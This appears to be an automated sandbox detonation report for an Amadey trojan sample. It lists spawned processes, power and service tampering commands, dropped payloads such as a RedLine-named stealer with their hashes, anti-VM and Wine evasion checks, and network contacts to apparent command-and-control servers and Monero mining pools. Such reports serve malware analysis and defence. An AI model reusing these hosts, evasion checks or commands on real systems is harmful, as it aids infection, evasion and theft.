C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBaxREWWY"

Network

Country Destination Domain Proto
RU 5.42.96.7:80 5.42.96.7 tcp
RU 77.221.151.47:80 77.221.151.47 tcp
RU 185.215.113.67:26260 tcp
RU 5.42.96.78:80 5.42.96.78 tcp
RU 77.221.151.47:8080 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 file-file-host6.com udp
RU 5.101.50.183:80 file-file-host6.com tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
US 104.20.3.235:443 pastebin.com tcp
RU 77.221.151.47:9090 tcp
RU 5.42.96.64:80 5.42.96.64 tcp
US 8.8.8.8:53 onlycitylink.com udp
RU 5.42.96.78:80 5.42.96.78 tcp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 1xst.ru udp
US 172.67.193.79:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.18.166:443 onlycitylink.com tcp
RU 5.42.96.78:80 5.42.96.78 tcp
US 172.67.193.79:443 realdeepai.org tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.60.76:443 firstfirecar.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
RO 109.98.58.98:80 1xst.ru tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
RO 109.98.58.98:80 1xst.ru tcp
DE 162.19.139.184:2222 xmr.2miners.com tcp
US 8.8.8.8:53 parrotflight.com udp
US 172.67.187.204:443 parrotflight.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 junglethomas.com udp
US 172.67.197.33:443 junglethomas.com tcp
RU 5.42.66.10:80 5.42.66.10 tcp
US 8.8.8.8:53 api.myip.com udp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
US 104.26.8.59:443 api.myip.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
US 3.162.143.213:80 sd.p.360safe.com tcp
RU 5.42.96.78:80 5.42.96.78 tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 sdfjhuz.com udp
MX 189.130.155.217:80 sdfjhuz.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 www.safeautomationbd.com udp
BD 103.174.152.66:443 www.safeautomationbd.com tcp
BD 103.174.152.66:443 www.safeautomationbd.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:9090 tcp
US 8.8.8.8:53 nessotechbd.com udp
US 192.185.16.114:443 nessotechbd.com tcp
US 192.185.16.114:443 nessotechbd.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.201.174:443 drive.google.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
NL 91.92.253.69:80 tcp
DE 45.76.89.70:80 tcp
US 8.8.8.8:53 zeph-eu2.nanopool.org udp
RU 77.221.151.47:8080 tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
NL 51.15.89.13:10943 zeph-eu2.nanopool.org tcp
RU 77.221.151.47:8080 tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
RU 77.221.151.47:8080 tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 beshomandotestbesnd.run.place udp
US 45.88.186.125:7000 beshomandotestbesnd.run.place tcp

Files

memory/1784-0-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/1784-1-0x0000000077640000-0x0000000077642000-memory.dmp

memory/1784-2-0x0000000000871000-0x000000000089F000-memory.dmp

memory/1784-3-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/1784-5-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/1784-6-0x0000000000870000-0x0000000000D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

MD5 17ee93b40d1746f9d99cf8521a2ab566
SHA1 371e878e7c8ff19a0f8771aefef9aeb6e28c2b87
SHA256 49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468
SHA512 21f8f6cf4d58775e4498bb1bb86437c30494d633da800ef3427bce4d7e4877018752fb091eb4627ccb0d14bc9f45afd199c752fceb1f4202d2b9d94efc6d01a7

memory/1784-16-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/2560-17-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-18-0x0000000001041000-0x000000000106F000-memory.dmp

memory/2560-19-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-21-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-22-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-23-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe

MD5 31841361be1f3dc6c2ce7756b490bf0f
SHA1 ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA512 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe

MD5 7f981db325bfed412599b12604bd00ab
SHA1 9f8a8fd9df3af3a4111e429b639174229c0c10cd
SHA256 043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b
SHA512 a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

memory/1816-59-0x0000000000030000-0x0000000000031000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe

MD5 9faf597de46ed64912a01491fe550d33
SHA1 49203277926355afd49393782ae4e01802ad48af
SHA256 0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715
SHA512 ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

memory/1836-78-0x0000000000290000-0x00000000002E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpB08B.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe

MD5 0f52e5e68fe33694d488bfe7a1a71529
SHA1 11d7005bd72cb3fd46f24917bf3fc5f3203f361f
SHA256 efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8
SHA512 238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe

MD5 808c0214e53b576530ee5b4592793bb0
SHA1 3fb03784f5dab1e99d5453664bd3169eff495c97
SHA256 434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61
SHA512 2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

C:\Program Files (x86)\GameSyncLink\installg.bat

MD5 5dee3cbf941c5dbe36b54690b2a3c240
SHA1 82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

Analysis: behavioral2

Detonation Overview

Submitted 2024-05-14 01:02
Reported 2024-05-14 01:04
Platform win10v2004-20240508-en
Max time kernel 142s
Max time network 127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Identifies Wine through registry keys

evasion

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4232,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
RU 5.42.96.7:80 5.42.96.7 tcp
US 8.8.8.8:53 7.96.42.5.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files
